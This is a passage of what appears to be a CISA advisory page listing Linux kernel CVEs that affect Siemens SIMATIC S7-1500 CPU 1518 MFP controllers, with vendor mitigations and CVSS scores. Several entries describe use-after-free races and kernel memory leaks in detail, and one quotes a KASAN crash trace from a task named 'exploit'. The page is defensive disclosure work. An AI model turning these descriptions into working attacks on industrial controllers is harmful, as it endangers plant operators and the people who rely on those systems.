<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31664</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: xfrm: clear trailing padding in build_polexpire() build_expire() clears the trailing padding bytes of struct xfrm_user_expire after setting the hard field via memset_after(), but the analogous function build_polexpire() does not do this for struct xfrm_user_polexpire. The padding bytes after the __u8 hard field are left uninitialized from the heap allocation, and are then sent to userspace via netlink multicast to XFRMNLGRP_EXPIRE listeners, leaking kernel heap memory contents. Add the missing memset_after() call, matching build_expire().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31664">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31665</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: fix use-after-free in timeout object destroy nft_ct_timeout_obj_destroy() frees the timeout object with kfree() immediately after nf_ct_untimeout(), without waiting for an RCU grace period. Concurrent packet processing on other CPUs may still hold RCU-protected references to the timeout object obtained via rcu_dereference() in nf_ct_timeout_data(). Add an rcu_head to struct nf_ct_timeout and use kfree_rcu() to defer freeing until after an RCU grace period, matching the approach already used in nfnetlink_cttimeout.c. KASAN report: BUG: KASAN: slab-use-after-free in nf_conntrack_tcp_packet+0x1381/0x29d0 Read of size 4 at addr ffff8881035fe19c by task exploit/80 Call Trace: nf_conntrack_tcp_packet+0x1381/0x29d0 nf_conntrack_in+0x612/0x8b0 nf_hook_slow+0x70/0x100 __ip_local_out+0x1b2/0x210 tcp_sendmsg_locked+0x722/0x1580 __sys_sendto+0x2d8/0x320 Allocated by task 75: nft_ct_timeout_obj_init+0xf6/0x290 nft_obj_init+0x107/0x1b0 nf_tables_newobj+0x680/0x9c0 nfnetlink_rcv_batch+0xc29/0xe00 Freed by task 26: nft_obj_destroy+0x3f/0xa0 nf_tables_trans_destroy_work+0x51c/0x5c0 process_one_work+0x2c4/0x5a0</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31665">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31669</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix slab-use-after-free in __inet_lookup_established The ehash table lookups are lockless and rely on SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability during RCU read-side critical sections. Both tcp_prot and tcpv6_prot have their slab caches created with this flag via proto_register(). However, MPTCP's mptcp_subflow_init() copies tcpv6_prot into tcpv6_prot_override during inet_init() (fs_initcall, level 5), before inet6_init() (module_init/device_initcall, level 6) has called proto_register(&amp;tcpv6_prot). At that point, tcpv6_prot.slab is still NULL, so tcpv6_prot_override.slab remains NULL permanently. This causes MPTCP v6 subflow child sockets to be allocated via kmalloc (falling into kmalloc-4k) instead of the TCPv6 slab cache. The kmalloc-4k cache lacks SLAB_TYPESAFE_BY_RCU, so when these sockets are freed without SOCK_RCU_FREE (which is cleared for child sockets by design), the memory can be immediately reused. Concurrent ehash lookups under rcu_read_lock can then access freed memory, triggering a slab-use-after-free in __inet_lookup_established. Fix this by splitting the IPv6-specific initialization out of mptcp_subflow_init() into a new mptcp_subflow_v6_init(), called from mptcp_proto_v6_init() before protocol registration. This ensures tcpv6_prot_override.slab correctly inherits the SLAB_TYPESAFE_BY_RCU slab cache.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31669">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31670</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: rfkill: prevent unlimited numbers of rfkill events from being created Userspace can create an unlimited number of rfkill events if the system is so configured, while not consuming them from the rfkill file descriptor, causing a potential out of memory situation. Prevent this from bounding the number of pending rfkill events at a "large" number (i.e. 1000) to prevent abuses like this.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31670">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31671</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: xfrm_user: fix info leak in build_report() struct xfrm_user_report is a __u8 proto field followed by a struct xfrm_selector which means there is three "empty" bytes of padding, but the padding is never zeroed before copying to userspace. Fix that up by zeroing the structure before setting individual member variables.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31671">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31674</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ip6t_rt: reject oversized addrnr in rt_mt6_check() Reject rt match rules whose addrnr exceeds IP6T_RT_HOPS. rt_mt6() expects addrnr to stay within the bounds of rtinfo-&gt;addrs[]. Validate addrnr during rule installation so malformed rules are rejected before the match logic can use an out-of-range value.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31674">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31680</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: ipv6: flowlabel: defer exclusive option free until RCU teardown `ip6fl_seq_show()` walks the global flowlabel hash under the seq-file RCU read-side lock and prints `fl-&gt;opt-&gt;opt_nflen` when an option block is present. Exclusive flowlabels currently free `fl-&gt;opt` as soon as `fl-&gt;users` drops to zero in `fl_release()`. However, the surrounding `struct ip6_flowlabel` remains visible in the global hash table until later garbage collection removes it and `fl_free_rcu()` finally tears it down. A concurrent `/proc/net/ip6_flowlabel` reader can therefore race that early `kfree()` and dereference freed option state, triggering a crash in `ip6fl_seq_show()`. Fix this by keeping `fl-&gt;opt` alive until `fl_free_rcu()`. That matches the lifetime already required for the enclosing flowlabel while readers can still reach it under RCU.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31680">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31682</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bridge: br_nd_send: linearize skb before parsing ND options br_nd_send() parses neighbour discovery options from ns-&gt;opt[] and assumes that these options are in the linear part of request. Its callers only guarantee that the ICMPv6 header and target address are available, so the option area can still be non-linear. Parsing ns-&gt;opt[] in that case can access data past the linear buffer. Linearize request before option parsing and derive ns from the linear network header.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31682">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31737</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: ftgmac100: fix ring allocation unwind on open failure ftgmac100_alloc_rings() allocates rx_skbs, tx_skbs, rxdes, txdes, and rx_scratch in stages. On intermediate failures it returned -ENOMEM directly, leaking resources allocated earlier in the function. Rework the failure path to use staged local unwind labels and free allocated resources in reverse order before returning -ENOMEM. This matches common netdev allocation cleanup style.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31737">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31752</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bridge: br_nd_send: validate ND option lengths br_nd_send() walks ND options according to option-provided lengths. A malformed option can make the parser advance beyond the computed option span or use a too-short source LLADDR option payload. Validate option lengths against the remaining NS option area before advancing, and only read source LLADDR when the option is large enough for an Ethernet address.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31752">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
